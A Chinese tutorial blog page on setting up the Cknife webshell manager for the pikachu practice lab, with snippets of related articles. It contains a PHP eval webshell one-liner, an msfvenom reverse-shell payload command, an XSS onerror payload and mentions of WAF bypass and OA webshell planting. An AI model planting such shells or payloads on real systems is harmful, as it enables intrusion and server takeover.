下载菜刀,打开Cknife.jar软件
注意:这里的菜刀文件存放的目录不要带有中文
打开
没错,这是我们熟悉的pikachu
但是这个网站的上传漏洞我还没学,所以暂时没法操作(等发了上传漏洞的视频我就来改)
基本思路就是
我可以在这里
绕过上传(通过burp抓包,改包,放包),把这个<?php @eval($_POST['pass']);?>
上传了,然后用菜刀,连接到这个网址下我们的菜刀文件上,右键点击文件管理,就可以获取整个网站的目录了。
Cknife的安装
article/2025/10/1 0:08:01
相关文章
IntelliJ IDEA生成jar包运行报Error:A JNI error has occurred,please check your installation and try again
首先介绍一下IntelliJ IDEA生成jar包的方式:
1、打开项目,打开FIile->Project Structure...菜单.如下图: 选中Artifacts,点号,选择JAR,再选择From modules with dependencies...,如下图: 在打开的界面中…
dvwa 切换php版本以及phpstorm -xdebug的配置使用
最近由于需要对dvwa 进行一些更改,对php啥也不懂的我,开始研究一下php开发环境,以及具体的搭建过程;
首先是需要下载安装破解phpstorm(不多说了,下载官网地址,破解网上一堆文章)
1…
上传漏洞-一句话木马
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写!
上传漏洞-一句话木马
讲述内容&…
![[对抗训练]“中国菜刀”安装,20180222](https://images2018.cnblogs.com/blog/1409315/201805/1409315-20180527003102485-1143800464.png)
[对抗训练]“中国菜刀”安装,20180222
[对抗训练]“中国菜刀”安装与使用 一、下载开源代码 从GitHub上下载开源的“中国菜刀”Java项目代码 地址:https://github.com/Chora10/Cknife压缩文件见附件1。 二、将项目存为可执行jar 打开eclipse(或其他java编辑器) 添加解压后的“中国…
我的java16和java8冲突解决办法(java版本冲突解决方法)
我的java16和java8冲突解决办
我的问题 vscode 支持java11以上burpsuite 支持java11以上cknife 只能java8JEB 只能java8全局变量设置java16的路径 对于java8 直接把只支持java8的文件目录放到java8中
在这里中用的是java8,这个目录有java文件
这个脚本可以自动隐藏窗口打开一…
msf上传文件到服务器,利用MSF技巧进入服务器
原标题:利用MSF技巧进入服务器 首先需要一台公网的机器,这是留着方便以后转发或者反弹用的. 1.生成payload的方式 msfvenom -p windows/meterpreter/reverse_tcp LHOST1.2.3.4 LPORT2333 -f exe -o 1234.exe 之后把后门复制出来上传到webshell 推荐不使用exe后缀 因…
mbp 封神台靶场 六(笔记)
打开链接,根据题目提示,flag在c盘根目录下,接上一关的网页后台,打开c盘,发现确实存在flag.txt,但是提示没有权限。 于是知道本关需要我们去进行提权操作,打开D盘,发现cmd.exe和iis6.exe…
张小白的渗透之路(五)——上传漏洞及解析漏洞详解
前言
web应用程序通常会有文件上传的功能,例如在BBS发布图片、在个人网站发布压缩包,只要web应用程序允许上传文件,就有可能存在文件上传漏洞。 上传漏洞与sql注射相比,风险更大,如果web应用程序存在上传漏洞…
Kali下常见webshell管理工具汇总
转 自 https://www.ohlinge.cn/kali/kali_webshell.html 0x01 前言 Kali Linux作为一款专为渗透测试而生的Linux操作系统,在安全界的影响广泛。一般的webshell在Windows下面经常使用Chopper(中国菜刀)来管理,那么在Linux下面,有没有类似的工…
无法直接打开jar文件,提示“你要以何种方式打开.jar文件”(已解决)
问题引入:
网络安全&CTF竞赛中有很多封装好的工具类似Cknife/CTFcrackTools.jar/Stegsolve.jar需要java环境打开
问题描述:
.jar文件只能通过dos命令打开,点击jar文件提示你要以何种方式打开.jar文件,并且选中jdk/bin/java…
开源渗透测试工具合集
子域名枚举工具
子域枚举和信息收集工具 Anubis
项目地址:https://github.com/jonluca/Anubis使用名为 Hacking with search engine 的技术列出有关主域的子域 N4xD0rk
项目地址:https://github.com/n4xh4ck5/N4xD0rk子域名爆破枚举工具 subDomainsBrut…
DVWA的upload文件上传漏洞(全难度)(小白向)
提示:只是为了方便理解,但不一定符合您的要求 文章目录 一、等级:low 二、等级:medium 三、等级:high
四:等级:impossible 前言
靶机ip:192.168.229.145
DVWA版本:v1.…
c php乱码,Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码
在现在满大街菜刀都存在后门问题的时候,Cknife横空出世了。因为开源,所以安全。因为可操作的空间挺大的,也十分适合过各种WAF。下面就是解决两个常见问题的过程。希望可以帮到各位白帽子。 但是使用过程中也遇到了一些小问题,被吐槽最多的就是…
致远OA_0day批量植Cknife马一步到位
最近各位师傅都在刷这个嘛,原本的exp是上传一个test123456.jsp的命令执行的马子,不过我在试的时候发现替换成C刀一句话出错,原因未知,并且test123456.jsp如果存在的话用原来exp是无法覆盖的。参考改进了t00ls师傅的代码(https://www.t00ls.ne…
linux 安全狗 乱码,打狗棒法之:Cknife(C刀)自定义模式秒过安全狗
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 相关阅读: 0x00 前言 很多朋友在使用Cknife时都误以为她只是菜刀的跨平台升级版,仅仅多了跨平台的功能,其实小伙伴…
Cknife流量分析
本文首发:https://<img src1 οnerrοr\u006coc\u0061tionj\x61v\x61script:\x61lert\x281\x29>testdemo 0x01 环境 <?php eval($_REQUEST[shell] ?> 0x02 命令执行 执行命令结果如下图所示 POST的数据如下图所示 对POST的数据解码 #shell
eval(base6…
渗透工具环境篇——Cknife中国菜刀的使用
提要
在学习上传漏洞的时候研究到了Cknife这个软件。下面来介绍一下菜刀的使用方法。
使用
1.下载菜刀,打开Cknife.jar软件
2.右键点击添加 3.输入上传的php文件,php文件密码,脚本类型选择PHP,字符编码GB2312,点…
关于cknife与burpsuite对java的版本需求的冲突机器解决办法
之前安装burpsuite时候使用的是jdk11,一直使用的没有问题,后来接触到了cknife,但在使用时却发现cknife需要jre1.7以上版本,但这有是burpsuit无法兼容的,翻来覆去整了半天,终于搞定了。。
1.先删除jdk-11
2.下载jdk-7u80,这里面是…